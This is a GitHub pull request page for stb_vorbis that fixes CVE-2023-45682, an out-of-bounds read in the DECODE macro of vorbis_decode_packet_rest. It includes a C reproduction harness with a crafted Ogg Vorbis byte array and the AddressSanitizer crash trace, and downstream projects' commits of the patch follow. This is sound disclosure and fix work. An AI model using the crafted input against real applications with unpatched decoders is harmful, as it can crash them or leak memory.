Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Fix Wild address read in vorbis_decode_packet_rest (GHSL-2023-172/CVE-2023-45682) #1560

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Fix Wild address read in vorbis_decode_packet_rest (GHSL-2023-172/CVE-2023-45682) #1560

wants to merge 1 commit into from

Conversation

JarLob
Copy link

@JarLob JarLob commented Oct 19, 2023

A crafted file may trigger out of bounds read in DECODE macro when var is negative [1]

#define DECODE(var,f,c)                                       \
   DECODE_RAW(var,f,c)                                        \
   if (c->sparse) var = c->sorted_values[var]; // [1] OOB

As it can be seen in the definition of DECODE_RAW negative var is a valid value [2] and [3] (codebook_decode_scalar_raw may also return a negative value).

#define DECODE_RAW(var, f,c)                                  \
   if (f->valid_bits < STB_VORBIS_FAST_HUFFMAN_LENGTH)        \
      prep_huffman(f);                                        \
   var = f->acc & FAST_HUFFMAN_TABLE_MASK;                    \
   var = c->fast_huffman[var];                                \
   if (var >= 0) {                                            \
      int n = c->codeword_lengths[var];                       \
      f->acc >>= n;                                           \
      f->valid_bits -= n;                                     \
      if (f->valid_bits < 0) { f->valid_bits = 0; var = -1; } \ // [2]
   } else {                                                   \
      var = codebook_decode_scalar_raw(f,c);                  \ // [3]
   }

Impact

This issue may be used to leak internal memory allocation information.

Resources

To reproduce the issue:

  1. Make ASAN build of the following program:
#include "../stb_vorbis.c"
#include <stdint.h>

int main(int argc, char* argv[])
{
    const uint8_t data[] = {0x4f,0x67,0x67,0x53,0x00,0x02,0x00,0x2b,0x00,0x00,0x00,0x00,0x00,0x00,0x39,0x30,0x00,0x00,
                            0x00,0x00,0x00,0x00,0xf1,0x49,0x93,0x48,0x01,0x1e,0x01,0x76,0x6f,0x72,0x62,0x69,0x73,0x00,
                            0x00,0x00,0x00,0x02,0x44,0xac,0x00,0x00,0xff,0xff,0xff,0xff,0x8f,0xb5,0x01,0x00,0xff,0xff,
                            0xff,0xff,0xb8,0x01,0x4f,0x67,0x67,0x53,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
                            0x39,0x30,0x00,0x00,0x01,0x00,0x00,0x00,0x65,0x9b,0x7d,0x94,0x0a,0x63,0xff,0xff,0xff,0xff,
                            0xff,0xff,0xff,0xff,0x3c,0x03,0x76,0x6f,0x72,0x62,0x69,0x73,0x20,0x00,0x00,0x00,0x58,0x6f,
                            0x7c,0x69,0x70,0x80,0x72,0x70,0x75,0x68,0x62,0x68,0xd4,0x75,0x6f,0x56,0x6f,0x72,0x62,0x69,
                            0x73,0x20,0x49,0x08,0x32,0x30,0x30,0x31,0x31,0x32,0x33,0x32,0x02,0x00,0x00,0x00,0x1c,0x00,
                            0x00,0x00,0x54,0x49,0x54,0x4c,0x45,0x3d,0x47,0x72,0x6f,0x6f,0x76,0x65,0x20,0x49,0x73,0x20,
                            0x49,0x6e,0x20,0x54,0x68,0x65,0xe9,0x48,0x65,0x61,0x72,0x74,0x0f,0x00,0x00,0x00,0x41,0x52,
                            0x54,0x49,0x53,0x54,0x3d,0x44,0x65,0x65,0x2d,0x6c,0x6d,0x74,0x65,0x01,0x05,0x76,0x6f,0x72,
                            0x62,0x69,0x73,0x22,0x42,0x43,0x56,0x01,0x00,0x40,0x00,0x00,0x06,0xc3,0xb2,0x2d,0x47,0xc4,
                            0x05,0x2c,0xc5,0xa3,0x6a,0x36,0x6c,0xc0,0xb4,0x01,0x00,0x00,0x00,0x10,0x1a,0xb2,0x0a,0x00,
                            0x00,0x02,0x00,0x30,0x38,0x92,0xa9,0x29,0x8e,0x29,0x5a,0x9a,0x0c,0x9a,0xa3,0xc9,0x9e,0xa4,
                            0xd9,0xa6,0x66,0x02,0xd1,0xf2,0x98,0x96,0x67,0xbb,0x9a,0x08,0xd8,0x2e,0x36,0x00,0x40,0x68,
                            0xc8,0x2a,0x00,0x00,0x10,0x00,0xc0,0x23,0x49,0x92,0x24,0x49,0x92,0x24,0x49,0x92,0x24,0x49,
                            0x96,0x64,0x49,0x96,0xa4,0x49,0x9a,0xa4,0x49,0x9a,0xa4,0x49,0x9e,0xe5,0x59,0xa2,0x25,0x5a,
                            0xa2,0x65,0x5a,0xa6,0x66,0x6a,0xaa,0xa6,0x6a,0xaa,0x27,0x7b,0xae,0xe7,0x8a,0xb2,0xe8,0x9a,
                            0xba,0xa9,0xab,0x54,0xaa,0xee,0xda,0x36,0x9b,0x6c,0xeb,0x6c,0x5b,0x07,0x9d,0x0e,0x40,0x07,
                            0x00,0x00,0x00,0x08,0x0d,0x59,0x05,0x00,0x64,0x00,0x00,0xe8,0x38,0x8e,0xe3,0x48,0x8a,0xa4,
                            0x48,0x8e,0xe4,0x48,0x92,0x64,0x59,0x96,0xa5,0x69,0x9a,0x06,0x84,0x86,0xac,0x02,0x00,0x64,
                            0x00,0x00,0x04,0x00,0x00,0x50,0x0c,0x45,0x71,0x14,0xc9,0x91,0x24,0xcf,0xf3,0x34,0xcf,0xe3,
                            0x01,0x80,0xd0,0x90,0x55,0x00,0x00,0x20,0x00,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,
                            0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x84,0x86,0xac,0x02,0x00,0x24,0x00,0x00,0x74,
                            0x1c,0xc7,0x71,0x24,0x45,0x72,0x1c,0xc7,0x71,0x1c,0x47,0x92,0x80,0xd0,0x90,0x55,0x00,0x80,
                            0x0c,0x00,0x80,0x00,0x00,0x14,0x45,0x71,0x1c,0xc7,0x71,0x24,0x49,0x92,0x24,0x4b,0xb2,0x2c,
                            0xcd,0xd2,0x34,0x4f,0xf3,0x34,0xd1,0x33,0x4d,0x4f,0x14,0x81,0xd0,0x90,0x55,0x00,0x00,0x20,
                            0x00,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x2c,0x83,0xe2,0x38,0x0e,0xc7,0x91,0x1c,0x4b,0x22,
                            0x49,0x92,0x84,0x05,0x00,0x00,0xb0,0x00,0x00,0x00,0x00,0x80,0xd0,0x90,0x55,0x00,0x00,0x02,
                            0x00,0x00,0x20,0x8c,0x22,0x88,0x31,0x20,0x34,0x64,0x15,0x00,0x00,0x01,0x00,0x60,0x70,0x14,
                            0x92,0x26,0x32,0x3c,0x91,0x05,0x20,0x34,0x64,0x15,0x00,0x00,0x04,0x00,0x60,0x30,0x2c,0xa2,
                            0x24,0x32,0x35,0x11,0x68,0x8a,0x45,0x94,0x44,0xb6,0xaa,0x02,0x59,0x74,0xc9,0xa6,0x4b,0x97,
                            0x75,0x00,0x00,0x00,0x84,0x86,0xac,0x02,0x00,0x80,0x00,0x00,0x0c,0x8a,0x24,0x6b,0x8e,0x65,
                            0x8a,0x9a,0xe9,0x83,0xa5,0x68,0xbe,0x26,0x79,0x3c,0x49,0x05,0xae,0x67,0x72,0x35,0x55,0x57,
                            0x3d,0x55,0x07,0x6c,0x74,0x5b,0x06,0x00,0x42,0x43,0x56,0x01,0x00,0x20,0x00,0x00,0x07,0xb2,
                            0xce,0x20,0x34,0x64,0x15,0x00,0x00,0x08,0x00,0x20,0x00,0x00,0x00,0x40,0x51,0x1c,0xc5,0x71,
                            0x24,0x47,0x72,0x24,0xc9,0x92,0x2c,0xc9,0xb2,0x2c,0x4d,0xd3,0x3c,0x4f,0x14,0x45,0xd1,0x33,
                            0x45,0x98,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0x0d,0x59,0x05,0x00,0x80,0x00,0x00,
                            0x10,0xc6,0x18,0x63,0x10,0x42,0x08,0x21,0xa4,0x90,0x42,0x0c,0x31,0xe5,0x94,0x53,0x90,0x49,
                            0x46,0x1d,0x05,0x42,0x43,0x56,0x01,0x00,0x80,0x00,0x00,0x02,0x00,0x00,0x00,0x0c,0x4b,0xb1,
                            0x14,0x4f,0xf1,0x1c,0xcf,0x51,0x1d,0x53,0x22,0xa9,0x12,0x4b,0xd5,0x78,0x34,0x1e,0x8f,0xc8,
                            0xa4,0x32,0x81,0x09,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x34,0x64,0x15,0x00,0x20,0x01,0x00,
                            0xa0,0x23,0x39,0x92,0x23,0x29,0x92,0xe2,0x28,0x8e,0x23,0x49,0x92,0x04,0x84,0x86,0xac,0x02,
                            0xff,0x64,0x00,0x00,0x04,0x00,0x60,0x38,0x8a,0xa4,0x48,0x8a,0xa5,0x68,0x8e,0x67,0x79,0x9a,
                            0x68,0x9a,0xa6,0xab,0xaa,0xaa,0x2b,0xbb,0x64,0x17,0x17,0x08,0x0d,0x59,0x05,0x00,0x00,0x02,
                            0x00,0x08,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
                            0x42,0x43,0x56,0x01,0xff,0x12,0x00,0x00,0x3a,0x8e,0xe3,0x38,0x8e,0xe3,0x38,0x8e,0xe3,0x38,
                            0x8e,0xe4,0x48,0x40,0x68,0xc8,0x2a,0x00,0x40,0x06,0x00,0x40,0x00,0x00,0x86,0x63,0x38,0x8a,
                            0xe5,0x68,0x92,0x27,0x79,0x96,0x67,0x79,0x9a,0xa7,0x79,0x9e,0xe7,0x79,0x9e,0x28,0x9a,0xa2,
                            0x29,0x8a,0x40,0x68,0xc8,0x2a,0x00,0x00,0x10,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x8a,
                            0xa3,0x38,0x8e,0xe3,0x48,0x92,0xe4,0xb0,0x48,0x96,0x23,0x49,0x16,0x8b,0x24,0x01,0x00,0x00,
                            0x00,0x00,0x00,0x00,0x20,0x34,0x64,0x25,0x00,0x00,0x04,0x00,0x60,0x01,0x57,0x95,0x79,0x9e,
                            0x08,0x2c,0xc7,0x32,0x41,0x93,0x2c,0x13,0x44,0x4d,0x13,0x21,0x81,0xe3,0x98,0x0a,0x28,0x8a,
                            0x27,0x7a,0x8e,0x63,0x79,0x9a,0x0c,0x84,0x86,0xac,0x08,0x00,0xe2,0x04,0x00,0x0c,0x8e,0x03,
                            0xcd,0x82,0x65,0xc1,0x75,0x01,0x8e,0x65,0x41,0xf4,0xe0,0x89,0xd0,0x65,0x80,0x63,0x59,0xf0,
                            0x44,0x88,0x1e,0x64,0x1b,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xcd,0x13,0x21,
                            0x8a,0x10,0x4d,0xd8,0x32,0xc0,0x12,0x3d,0x88,0x22,0x4c,0x11,0xae,0x0d,0x00,0x00,0x00,0x00,
                            0x00,0x00,0x00,0x00,0x00,0x80,0x25,0x7a,0x30,0x45,0x88,0x22,0x64,0x19,0x60,0x79,0x22,0x44,
                            0x13,0xa2,0x08,0x59,0x06,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x95,0x6d,0xc8,
                            0x36,0x64,0x19,0xba,0x0e,0x70,0x75,0x19,0xb2,0x0c,0x59,0x86,0xae,0x03,0x00,0x00,0x00,0x00,
                            0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
                            0x02,0x00,0x00,0x07,0xdb,0xff,0x00,0x02,0x4c,0x28,0x03,0x85,0x86,0xac,0x04,0x00,0xa2,0x00,
                            0x00,0x0c,0x8a,0x22,0x49,0x40,0x92,0x34,0x0b,0x48,0x92,0xa5,0x01,0xcf,0x13,0x45,0x80,0x29,
                            0x02,0x64,0x17,0xe0,0xba,0x00,0xdb,0x06,0x00,0x02,0x00,0x00,0x09,0xea,0x64,0xb8,0x02,0x6c,
                            0xd0,0x94,0x58,0x1c,0xa0,0xd0,0x90,0x95,0x00,0x40,0x48,0x00,0x80,0x43,0x51,0x24,0xc9,0xb2,
                            0x3c,0x0f,0x80,0xe3,0x58,0x96,0xa6,0x79,0x22,0x00,0xc7,0xb1,0x2c,0x4d,0x13,0x3d,0x00,0x9e,
                            0xe7,0x79,0xa2,0x68,0x9a,0x00,0xf0,0x3c,0x51,0x34,0x4d,0x00,0xa8,0xaa,0xaa,0xaa,0x2a,0x00,
                            0x54,0xd5,0x54,0x55,0x15,0x00,0xb2,0x2c,0xcb,0xb6,0x0c,0x00,0x64,0x59,0x96,0x01,0x80,0xae,
                            0xfb,0x3a,0x00,0xb0,0x75,0x5f,0x07,0x00,0xc2,0x30,0x1c,0x01,0x00,0x61,0x08,0x00,0x18,0x4b,
                            0x00,0xc0,0x58,0x02,0x00,0xc6,0x11,0x00,0x00,0x40,0x00,0x00,0xc0,0x81,0x03,0x00,0x40,0x80,
                            0x11,0x87,0x92,0x51,0x65,0x11,0x30,0x9a,0x70,0xe1,0x01,0x28,0x34,0x64,0x25,0x00,0x10,0x0e,
                            0x00,0x60,0x50,0x0c,0xcb,0xf2,0x3c,0x55,0x05,0xd5,0x4b,0xf3,0x3c,0xd3,0x94,0x65,0xc0,0xd3,
                            0x2c,0xcf,0x33,0x4d,0xd9,0x05,0xa8,0xae,0xaa,0xba,0xaa,0xad,0x03,0x5c,0xd3,0x75,0x65,0x59,
                            0xd7,0x01,0xb6,0xf0,0xea,0xb6,0xae,0xfb,0x00,0xb6,0xee,0xea,0xba,0x31,0x04,0x90,0x85,0x5d,
                            0x58,0x02,0x50,0x5e,0x63,0x27,0x04,0x10,0xda,0xca,0x12,0x00,0x5d,0x99,0x19,0x01,0xf0,0x29,
                            0x01,0xc0,0x26,0x04,0xc0,0x68,0x04,0x00,0x84,0x40,0x00,0x00,0xe6,0x82,0x00,0x00,0x70,0x81,
                            0xcd,0x31,0xac,0x24,0x9d,0x15,0x8e,0x06,0x17,0x1a,0xb2,0x12,0x00,0x88,0x01,0x00,0x20,0x0c,
                            0x41,0x08,0x21,0x87,0x90,0x42,0x4a,0x31,0x84,0x90,0x52,0xca,0x31,0xc6,0x18,0x63,0xce,0x39,
                            0xc6,0x18,0x83,0x10,0x3a,0xe7,0x1c,0x84,0x90,0x31,0xe7,0x04,0x00,0x00,0x0e,0x38,0x00,0x00,
                            0x04,0x98,0x98,0x98,0xc2,0x42,0x43,0x56,0x04,0x00,0x51,0x00,0x00,0x06,0x45,0x01,0x1c,0x49,
                            0x02,0x1c,0x49,0x02,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x01,0x0e,0x00,0x00,
                            0x01,0x16,0x42,0xa1,0x21,0x2b,0x01,0x80,0x28,0x00,0x00,0x83,0x62,0x48,0x8e,0x66,0x79,0x1e,
                            0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x80,0x00,0x00,0x80,0x02,0x07,0x00,0x80,0x00,0x1b,
                            0x31,0x25,0x24,0x07,0x28,0x34,0x64,0x25,0x00,0x90,0x0a,0x00,0x60,0x50,0x0c,0xcb,0x72,0x55,
                            0x40,0xb3,0x3c,0xcf,0x24,0x03,0x9a,0x27,0x89,0x1a,0x19,0x20,0x52,0xc9,0x00,0x44,0xd7,0x04,
                            0xe0,0x52,0xc9,0x00,0x64,0x26,0x00,0x00,0x00,0x19,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x04,
                            0x00,0x48,0xb9,0xca,0xff,0xcd,0x32,0xd9,0xb0,0x3a,0xc2,0x49,0xd1,0x58,0x60,0xa1,0x21,0x2b,
                            0x01,0x80,0x08,0x01,0x00,0x87,0xa2,0x48,0x92,0x65,0x69,0x9a,0xe6,0x79,0x9e,0xe7,0x89,0x9e,
                            0xe7,0x79,0x9e,0x28,0x6a,0x96,0xa5,0x69,0x9a,0xe7,0x79,0x9e,0x28,0x8a,0xa2,0x69,0x8a,0xa2,
                            0x28,0x8a,0xa6,0x29,0x5b,0x96,0xa6,0x79,0x9e,0xe7,0x89,0x9e,0x28,0x8a,0xa2,0x28,0x8a,0xa2,
                            0x28,0x9a,0xa6,0x2d,0x8a,0x9e,0x28,0x8a,0xa2,0x69,0x9a,0xa6,0x69,0x9a,0xa6,0x6a,0x9a,0xa6,
                            0xa9,0xaa,0xb2,0x29,0x8a,0x9e,0x28,0x9a,0xa2,0x29,0x9a,0xa6,0x69,0x9a,0xa6,0x69,0x9a,0xa6,
                            0x69,0xca,0xaa,0x2c,0x9a,0xa6,0x69,0xaa,0xa6,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,
                            0x6a,0xcb,0xb6,0x29,0xaa,0xa6,0x6a,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xba,0xaa,
                            0xad,0xdb,0xaa,0xab,0xaa,0xaa,0xab,0xaa,0xaa,0xab,0xba,0xaa,0xaa,0xaa,0xaa,0xea,0xba,0xb6,
                            0x6d,0xbb,0xa6,0x6a,0xaa,0xa6,0xab,0xba,0xae,0xea,0xba,0xae,0xaa,0xaa,0xaa,0xeb,0xda,0xb6,
                            0xed,0xca,0xa6,0xac,0xba,0xae,0xeb,0xba,0xae,0xeb,0xba,0xae,0xaa,0xba,0xae,0x2c,0xcb,0xb6,
                            0x2c,0xbb,0xa6,0xab,0xba,0xae,0xeb,0xba,0xae,0xeb,0xba,0xae,0xeb,0xba,0xae,0x6e,0xeb,0xb2,
                            0xad,0xca,0xae,0xec,0xba,0xb2,0x2b,0xcb,0xb2,0xeb,0xba,0xb2,0x2b,0xcb,0xb2,0x2c,0xcb,0x5c,
                            0xd5,0x55,0x5d,0xd7,0x75,0x5d,0xd7,0x95,0x65,0xdb,0x75,0x65,0xd9,0x96,0x6d,0xdb,0x96,0x65,
                            0xd7,0x76,0x5d,0x57,0x96,0x5d,0x59,0x96,0x5d,0xd7,0x95,0x5d,0x59,0xd7,0x6d,0x5d,0xb6,0x6d,
                            0x55,0x96,0x65,0x59,0x76,0x65,0x59,0x76,0x5d,0x59,0x96,0x6d,0xdf,0xb6,0x65,0xdb,0x76,0x65,
                            0x59,0x96,0x6d,0x59,0x96,0x65,0x59,0x96,0x5d,0x59,0xf6,0x75,0xd9,0xd6,0x6d,0x5b,0x76,0x65,
                            0x57,0x76,0x65,0x59,0x96,0x65,0x57,0xb6,0x65,0x59,0xb7,0x65,0xdb,0xb6,0x6d,0x5d,0x76,0x6d,
                            0x57,0xb6,0x65,0x5b,0x96,0x65,0x57,0x96,0x65,0x5b,0xb6,0x6d,0xdb,0xb6,0x6d,0x5b,0x96,0x6d,
                            0x59,0x76,0x65,0x5d,0x96,0x65,0xd9,0xb6,0x6d,0xdf,0xb6,0x6d,0xdf,0xd6,0x6d,0x5b,0x96,0x5d,
                            0x59,0x96,0x65,0x59,0x96,0x6d,0xdb,0xb6,0x6d,0x5b,0xd6,0x6d,0xdb,0xb6,0x75,0xd9,0x96,0x5d,
                            0xd9,0x96,0x6d,0x59,0x96,0x6d,0x5b,0xb7,0x75,0x5d,0xb7,0x6d,0xdb,0xb7,0x75,0x59,0x97,0x5d,
                            0xdb,0xb6,0x6d,0x59,0xd6,0x75,0x9b,0x6e,0xeb,0xba,0xed,0xd3,0x75,0x5b,0x96,0x65,0x5b,0x96,
                            0x6d,0x5d,0xb6,0x75,0x01,0x00,0x08,0x0b,0x0e,0x00,0x80,0x83,0x46,0x96,0x62,0xa9,0x21,0x77,
                            0x9e,0x81,0x25,0x12,0x33,0xa6,0xa0,0xa1,0x02,0x2b,0x34,0x64,0x45,0x00,0x10,0x05,0x00,0xc0,
                            0x20,0xc4,0x94,0x62,0x4a,0x21,0x84,0x98,0x52,0x4c,0x31,0x84,0x10,0x53,0x8a,0x29,0xc5,0x18,
                            0x63,0x8c,0x31,0xc6,0x18,0x63,0x8c,0x31,0xc6,0x98,0x52,0x8c,0x31,0xc6,0x18,0x63,0x8c,0x31,
                            0xc6,0x18,0x63,0x4a,0x29,0xc6,0x18,0x63,0x8c,0x31,0xc6,0x18,0x63,0x8c,0x09,0x00,0x00,0x07,
                            0x70,0x00,0x00,0x08,0xb0,0x10,0x0a,0x0d,0x59,0x09,0x00,0x00,0x01,0x00,0x58,0x4c,0xd7,0xf6,
                            0x35,0xd1,0x17,0x15,0xc7,0xf2,0x24,0xcf,0x77,0x1d,0x47,0xd2,0x3c,0x51,0xb8,0x2d,0x49,0xb2,
                            0x5c,0x97,0xef,0x59,0x92,0xa3,0xeb,0xa2,0x06,0x8a,0x64,0x7b,0x20,0x49,0xb2,0x2f,0xec,0xb2,
                            0x26,0xbb,0x26,0x00,0x00,0x00,0x82,0x00,0x00,0x03,0x11,0x21,0x31,0x06,0x24,0x02,0x00,0x41,
                            0x81,0x81,0x0c,0x00,0x31,0x40,0x48,0xe8,0x0c,0x11,0x8f,0x4e,0xe8,0xdf,0x2c,0xf9,0x71,0xf4,
                            0xd7,0x9b,0xc1,0xc5,0xa8,0x1a,0x73,0x00,0x80,0x82,0x10,0x11,0x91,0x99,0x51,0x10,0x1a,0x0f,
                            0x4b,0x43,0x22,0x42,0x6e,0x00,0x48,0x4c,0x50,0x48,0x06,0x8b,0x0f,0x80,0x8b,0x14,0xcb,0xc2,
                            0x27,0x71,0xc0,0xda,0xba,0x88,0xde,0x04,0xe2,0x1c,0x31,0xff,0xc8,0xd3,0x5b,0x1e,0x90,0x00,
                            0x05,0x40,0x88,0x63,0x80,0x02,0xc2,0x8d,0xda,0x9a,0x65,0xfe,0x37,0x1a,0xf3,0xd4,0x14,0x73,
                            0x0f,0x00,0x00,0x04,0x00,0x00,0xa0,0x9a,0x1e,0x00,0x00,0x00,0x8e,0x0d,0x20,0xa2,0x21,0x3a,
                            0x8c,0x0c,0x8d,0x0d,0x8e,0x10,0x90,0x8f,0x0e,0x0e,0x00,0x00,0x01,0x00,0x00,0x03,0x40,0x87,
                            0xf0,0x00,0x80,0x43,0x04,0x88,0x68,0x88,0x0e,0x23,0x43,0x63,0x83,0xa3,0xc3,0xe3,0x03,0x24,
                            0x24,0x00,0x00,0x10,0x40,0x00,0x02,0x00,0x00,0x00,0x04,0x10,0x80,0x80,0x80,0x00,0x00,0x00,
                            0x00,0x00,0x40,0x00,0x00,0x00,0x80,0x80,0x4f,0x67,0x67,0x53,0x00,0x00,0xc0,0x2e,0x00,0x00,
                            0x00,0x00,0x00,0x00,0x39,0x30,0x00,0x00,0x02,0x00,0x73,0xdc,0x00,0xcd,0x27,0x00,0x05,0x01,
                            0x0d,0x01,0x00,0x00,0x03,0x66,0xba,0x01,0x1e,0x38,0x89,0x8d,0x06,0xfc,0x00,0xd1,0x00,0x2e,
                            0xb3};
    size_t size = sizeof(data);

    int chan, samplerate;
    short *output;
    int samples = stb_vorbis_decode_memory(data, size, &chan, &samplerate, &output);
    if (samples >= 0)
        free(output);
    return 0;
}
  1. Run the program to hit the error.
AddressSanitizer:DEADLYSIGNAL
=================================================================
==241158==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x0000005001e0 bp 0x7ffc7060a860 sp 0x7ffc70608e40 T0)
==241158==The signal is caused by a READ memory access.
    #0 0x5001e0 in vorbis_decode_packet_rest(stb_vorbis*, int*, Mode*, int, int, int, int, int*) tests/../stb_vorbis.c:3231:22
    #1 0x4e1480 in vorbis_decode_packet(stb_vorbis*, int*, int*, int*) tests/../stb_vorbis.c:3453:11
    #2 0x4f4628 in vorbis_pump_first_frame(stb_vorbis*) tests/../stb_vorbis.c:3512:10
    #3 0x4f94b6 in stb_vorbis_open_memory tests/../stb_vorbis.c:5116:10
    #4 0x4fbfb1 in stb_vorbis_decode_memory tests/../stb_vorbis.c:5390:20

sezero added a commit to sezero/SDL_mixer that referenced this pull request Dec 11, 2023
@sezero
stb_vorbis: fix CVE-2023-45682
3b14cdd 
Based on patch by Jaroslav Lobačevski (@JarLob) submitted to
mainstream at nothings/stb#1560

GHSL-2023-172/CVE-2023-45682: Wild address read in vorbis_decode_packet_rest()
@sezero sezero mentioned this pull request Dec 11, 2023
Merged
icculus pushed a commit to libsdl-org/SDL_mixer that referenced this pull request Dec 11, 2023
@sezero @icculus
stb_vorbis: fix CVE-2023-45682
47cff74 
Based on patch by Jaroslav Lobačevski (@JarLob) submitted to
mainstream at nothings/stb#1560

GHSL-2023-172/CVE-2023-45682: Wild address read in vorbis_decode_packet_rest()
sezero added a commit to libsdl-org/SDL_mixer that referenced this pull request Dec 11, 2023
@sezero
stb_vorbis: fix CVE-2023-45682
17b4de7 
Based on patch by Jaroslav Lobačevski (@JarLob) submitted to
mainstream at nothings/stb#1560

GHSL-2023-172/CVE-2023-45682: Wild address read in vorbis_decode_packet_rest()

(cherry picked from commit 47cff74)
sezero added a commit to icculus/SDL_sound that referenced this pull request Dec 11, 2023
@sezero
stb_vorbis: fix CVE-2023-45682
9ebcb8b 
Based on patch by Jaroslav Lobačevski (@JarLob) submitted to
mainstream at nothings/stb#1560

GHSL-2023-172/CVE-2023-45682: Wild address read in vorbis_decode_packet_rest()
sezero added a commit to sezero/libxmp that referenced this pull request Dec 11, 2023
@sezero
stb_vorbis: fix CVE-2023-45682
0223cb0 
Based on patch by Jaroslav Lobačevski (@JarLob) submitted to
mainstream at nothings/stb#1560

GHSL-2023-172/CVE-2023-45682: Wild address read in vorbis_decode_packet_rest()
@sezero sezero mentioned this pull request Dec 11, 2023
Merged
sezero added a commit to sezero/stb that referenced this pull request Dec 12, 2023
@sezero
stb_vorbis: fix CVE-2023-45682
373de9d 
Based on patch by Jaroslav Lobačevski (@JarLob) submitted to
mainstream at nothings#1560

GHSL-2023-172/CVE-2023-45682: Wild address read in vorbis_decode_packet_rest()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
1 participant
@JarLob